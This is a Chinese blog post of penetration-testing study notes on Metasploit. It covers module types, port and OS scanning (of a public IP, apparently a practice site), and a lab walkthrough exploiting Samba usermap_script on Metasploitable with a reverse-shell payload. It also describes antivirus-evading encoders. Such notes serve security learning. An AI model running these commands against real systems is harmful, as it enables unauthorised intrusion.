Web安全攻防-----学习笔记(五)之Metasploit技术

最新推荐文章于 2024-07-14 23:47:02 发布
最新推荐文章于 2024-07-14 23:47:02 发布
阅读量404 收藏 2
点赞数
分类专栏: web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cxcsdn666/article/details/100775323
版权
web 同时被 2 个专栏收录
16 篇文章 0 订阅
订阅专栏
安全
16 篇文章 0 订阅
订阅专栏

第5章  Metasploit技术

  • apt-get update:只更新软件包的索引源,作用是同步源的软件包的索引信息,从而进行软件更新
  • apt-get upgrade:升级系统上安装的所有软件包,若更新失败,所涉及的包会保持更新之前的状态。
  • apt-get dist-upgrade:升级整个Linux系统

5.2 Metasploit基础

5.2.1  专业术语

MSF框架由多个模块组成:

1. Auxiliaries(辅助模块)

不会直接在测试者和目标主机之间建立访问,它们只负责执行扫描、嗅探、指纹识别等相关功能以及辅助渗透测试。

2. Exploit(漏洞利用模块)

漏洞利用指测试者利用一个系统、应用或者服务中的安全漏洞进行的攻击行为。流行的渗透攻击技术包括缓冲区溢出、Web应用程序攻击、以及利用配置错误等其中包含测试者针对系统中的漏洞而设计的各种POC验证程序,用于破坏系统安全性的攻击代码,每个漏洞都有相应的攻击代码。

3.Payload(攻击载荷模块)

攻击载荷是我们期望目标系统被渗透攻击之后完成实际功能的代码,成功渗透目标后,用于在目标系统上运行任意命令或者执行指定代码,在Metasploit框架中可以自由地选择、传送和植入。

4.Post(后期渗透模块)

主要用于在取得目标系统远程控制权后,进行的一系列的后渗透攻击动作,如获取敏感信息、实施跳板攻击等。

5.Encoders(编码工具模块)

该模块在渗透测试中负责免杀,以防止被杀毒软件、防火墙、IDS(Intrusion Detection Systems)及类似的安全软件检测出来。

5.2.2 渗透攻击步骤

  • 扫描目标机系统,寻找可以利用漏洞
  • 选择并配置一个漏洞利用模块
  • 选择并配置一个攻击载荷模块
  • 选择一个编码技术,用来绕过杀毒软件的查杀
  • 渗透攻击

5.3 主机扫描

5.3.1 使用辅助模块进行端口扫描

先利用search命令查看有哪些可用模块:

search portscan

以TCP扫描模块举例: 

use auxiliary/scanner/portscan/tcp

使用show options命令查看需要设置的参数:

  • RHOST:设置待扫描的IP地址
  • PORTS:设置扫描端口范围
  • THREADS:设置扫描线程,线程数量越高,扫描速度越多

目标地址:http://43.247.91.228:81/login.php

使用set命令设置相关参数,unset取消某个参数的设置

可以看到目标机器(在1-1000内)开了22、80、81、82、84、85、83端口。

5.3.2 使用辅助模块进行服务扫描

先查看有哪些扫描模块:

search scanner

常用扫描模块及其功能:

5.3.3 使用Nmap扫描

熟练掌握Nmap的用法可以极大地提高个人渗透测试技术。

nmap -O -Pn 43.247.91.228

此处为大写的O,不是0.。。

发现目标主机操作系统有多种可能。

5.4 漏洞利用

每个操作系统都会存在各种Bug,全世界有大量的漏洞研究人员会夜以继日地发现、研究新的Bug,这些没有公布的Bug就是所谓的0day漏洞

扫描自行搭建的Metasploit 2靶机:

收集到目标机相关信息后,为其选择正确的Exploit和合适的Payload。发现主机运行着Samba 3.X服务

Samba是在Linux和UNIX系统上实现SMB(Server Message Block,信息服务块)协议的一款免费软件。

查看Samba的漏洞利用模块,并选择合适的漏洞利用模块:

发现红色模块 被标记为“Excellent”,即最杰出且时间是最新的,为提高渗透成功率,选择此模块渗透。有关漏洞的信息可以通过info命令查看。

info exploit/multi/samba/usermap_script

使用该模块:

use exploit/multi/samba/usermap_script

使用show options 即可查看该漏洞利用模块下可以供选择的攻击模块。因为目标主机是LInux机器,因此一定要选择Linux的攻击载荷。

set PAYLOAD cmd/unix/reverse

设置被攻击主机IP地址,

set RHOSTS 192.168.1.180

设置漏洞利用的端口号,

set RPORT 445

设置发动攻击主机IP地址,

set LHOST 192.168.1.100

 设置完所有参数变量后,输入攻击命令exploit或者run。

观察到成功的从目标主机上拿到了一个shell ,输入hostname 可以查看为metasploitable

MSF发动攻击成功后会获取目标主机的Shell,渗透Windows系统的过程类似,唯一的差别是选择的漏洞利用模块和攻击载荷模块不一样。建议尝试各种Exploit和Payload的组合,以加深理解。

续:Web安全攻防-----学习笔记(五)之后渗透攻击:信息渗透

家住海边就爱浪吖
关注
专栏目录
[漏洞挖掘与防护] 03.漏洞利用之WinRAR安全缺陷复现(CVE-2018-20250)及软件自启动分析
杨秀璋的专栏
08-26 306
上一篇文章将详细介绍MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程,它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。这篇文章将详细讲解WinRAR漏洞(CVE-2018-20250),并复现了该漏洞和讲解了恶意软件自启动劫持原理。基础性文章,希望对入门的同学有帮助。
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
Metasploit技术
Teemos的博客
09-17 1711
1 metasploit介绍 metasploit框架(Metasploit Framework,MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模块化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。 metasploit可向后端模块提供多种用来控制测试的接口(如控制台、web、CLI)。通过控制台接口,还可以访问和使用所有metasploit的插件,例如payload、利用模块、post模块等。此外,metasploit还有第三方程序的接口,如nmap和sqlmap
Metasploit基础(WEB安全攻防读书笔记)
小英雄颂人头
02-28 267
0xx1 Metasploit基础 Auxiliaries(辅助模块) 不会在测试者和目标主机之间建立访问,只负责进行扫描,嗅探,指纹识别等相关功能辅助渗透 Exploit(漏洞利用模块) 漏洞利用是指由渗透测试者利用一个系统,应用或服务中的安全漏洞进行的攻击行为 Payload(攻击载荷模块) 攻击载荷是目标系统在被渗透攻击之后完成实际攻击功能的代码,成功渗透目标后,用于在目标系统上运行任...
渗透学习 | Metasploit技术
m_de_g的博客
08-23 325
1.Metasploit简介 Metasploit是当前信息安全与渗透测试领域最流行的术语,它完全颠覆了已有的渗透测试方式。几乎所有流行的操作系统都支持Metasploit,而且Metasploit框架在这些系统上的工作流程基本都一样。 Metasploit框架(Metasploit Framework,MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。 Metasploit可向后端模块提供多种用来控制测试的接口(如
Metasploit技术初入门01
WM_NNXX的博客
06-09 295
开启命令:msfconsole 开启界面如下: MSF框架主要有个模块组成,分别是 1 辅助模块 2 漏洞利用模块 3 攻击载荷模块 4 后期渗透模块 5 编码工具模块 渗透攻击步骤主要有: 1 扫描目标机系统,寻找可用漏洞 2 选择并配置一个漏洞利用模块 3 选择并配置一个攻击载荷模块 4 选择一个编码技术,用来绕过杀毒软件的查杀 5 渗透攻击 渗透测试的第一步是信息收集,所以我们在这里需要做的是主机扫描,主要关注IP地址,开放的服务和端口等。 使用辅助模块进行端口扫描,这里使用s
网络安全最新网络安全-sqlmap学习笔记_sqlmap --no-cast
2301_82242964的博客
05-04 692
检测和利用SQL注入的工具。sqlmap官网sqlmapWiki本文参考用户手册,有删减,算是低创,但并非完全翻译,有包含自己的抓包及部分使用sqlmap注入的内容,sqlmap实战在文末链接。--prefix和--suffix在某些情况下,仅当用户提供要添加到注入有效负载的特定后缀时,漏洞参数才可利用。当用户已经知道查询语法并想通过直接提供注入有效载荷前缀和后缀来检测和利用SQL注入时,这些选项很方便出现的另一种情况就会出现。为了检测和利用此SQL注入,您可以让sqlmap 在检测阶段为您检测边界。
Web安全攻防渗透测试实战指南笔记
Ren59421的博客
04-05 8081
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
[漏洞挖掘与防护] 02.漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
最新发布
杨秀璋的专栏
07-14 599
上一篇文章将详细介绍Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程,它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。希望对入门的同学有帮助。
web_exploit_detector:Web Exploit Detector是一个Node.js应用程序,用于检测Web托管环境中的可能感染,恶意代码和可疑文件。
02-05
Web漏洞检测器 介绍 Web Exploit Detector是一个Node.js应用程序(和NPM模块),用于检测Web托管环境中的可能感染,恶意代码和可疑文件。 该应用程序旨在在托管一个或多个网站的Web服务器上运行。 运行该应用程序将生成可能被感染的文件的列表,以及感染的描述以及与之相关的在线资源的引用。 从1.1.0版开始,该应用程序还包括用于生成和比较目录结构快照的实用程序,允许用户查看是否已修改,添加或删除任何文件。 该应用程序托管在GitHub上,以便其他人可以从中受益,并允许其他人贡献自己的检测规则。 链接 我的网站: : 我的网络安全博客,其中包含描述其中一些漏洞
Metasploit技术初入门02
WM_NNXX的博客
06-27 299
metasploit的模块主要有个,辅助模块,漏洞利用模块,攻击载荷模块,后期渗透模块,编码工具模块 在上一篇中我们依次使用了前三个模块,并拿到了一个目标机的shell,接下来就是后期渗透模块的使用了。metasploit主要提供了一个叫meterpreter的后期渗透工具,比较好用。 使用后期渗透模块-工具meterpreter 我们已经得到了一个shell,因为这个shell可能不稳定,所以接下来要迁移这个shell,将它和目标机的一个稳定的进程绑定一起。 首先使用ps命令查看目标机已运行的进程,然后
[系统安全] 三十七.Metasploit技术之基础用法万字详解及防御机理
杨秀璋的专栏
01-13 3706
系统安全将更好地帮助初学者了解病毒逆向分析和系统安全。前文讲解了APT攻击中常用的攻击手段,即PowerShell和PowerSploit脚本攻击,并进一步结合MSF漏洞利用来实现脚本攻击。这篇文章将带领大家了解Metasploit技术,它和CS都是APT攻击中常见的方式,并结合作者之前的漏洞利用及WannaCry逆向经验总结。希望这篇文章对您有帮助!
[网络安全提高篇] 一〇二.Metasploit技术之基础用法万字详解及防御机理
杨秀璋的专栏
02-26 6184
本文是“网络安全提高篇”第二篇文章,将带领大家了解Metasploit技术,并结合作者之前的漏洞利用及WannaCry逆向经验总结。同时本文学习了徐焱老师他们的《Web安全攻防渗透测试实战指南》,在此感谢。具体内容包括:一.Metasploit简介 二.Metasploit基础普及 1.专业术语 2.渗透步骤及攻击链 三.主机扫描 1.使用辅助模块进行端口扫描 2.使用辅助模块进行服务扫描 3.使用Nmap扫描 四.漏洞利用之MS17-010案例 1.背景知识 2.漏洞利用复现 3.防御措施
metasploit 简介
发哥微课堂
01-03 3038
0x00:简介 metasploit 是一个开源框架,这个框架用来做渗透测试,其 msf 是由多个不同的模块组成的,在使用方面的话,可以在 kali 中直接使用,命令行 msfconsole 即可。 metasploit 会经常更新其中的一些模块和内容,若在 kali 中使用,建议经常更新,命令一般是 apt-get update,apt-get upgrade,apt-get dist-up...
CTF-web 第十三部分 命令注入
热门推荐
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
web漏洞之payload
hdquan321的博客
04-30 8149
什么是payloadpayload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等。 也有人把payloads称 为shellcode。 Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务器的。 payload有几种类型: 1、sing...
关于Metasploit 5中测试模块的移植与验证
systemino的博客
05-26 305
前言 如果针对某一程序或软件已经有了相应的渗透模块,此时再去写一个实现类似功能的模块就显得多此一举。然而,并非所有的渗透模块都是基于Metasploit框架开发的,其中有很多是用Perl、Python或者C/C++语言编写的,所以导致了这些模块不能直接在Metasploit中使用。此时需要将现有的渗透模块移植成为与Metasploit框架相兼容的模块,移植成功之后,不仅能够实现原有模块的功能,还...
web网络安全——网站入侵(一)
lv小笨鸟要先飞啦
12-18 1万+
前言:哈哈哈,Mark,硕士入学以来第一个渗透成功的网站,成功脱裤。都说研究生生活苦,确实是,从接到入侵网站都入侵成功整整半个月,纯属运气,首先网站很low,其次本人运气好,废话不多说,直接上过程。 入侵一般步骤  查询网站被入侵记录 查询途径:https://www.hac-ker.net/search.php?var=Heihu&page=3 https://www.se
Metasploit渗透测试教程:利用MS12-004漏洞
Metasploit是一款开源的安全工具,广泛用于渗透测试和漏洞评估。本教程以MS12-004漏洞为例,展示了如何利用Metasploit进行渗透测试。 MS12-004是微软在2012年发布的一个安全更新,修复了Internet Explorer中的一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值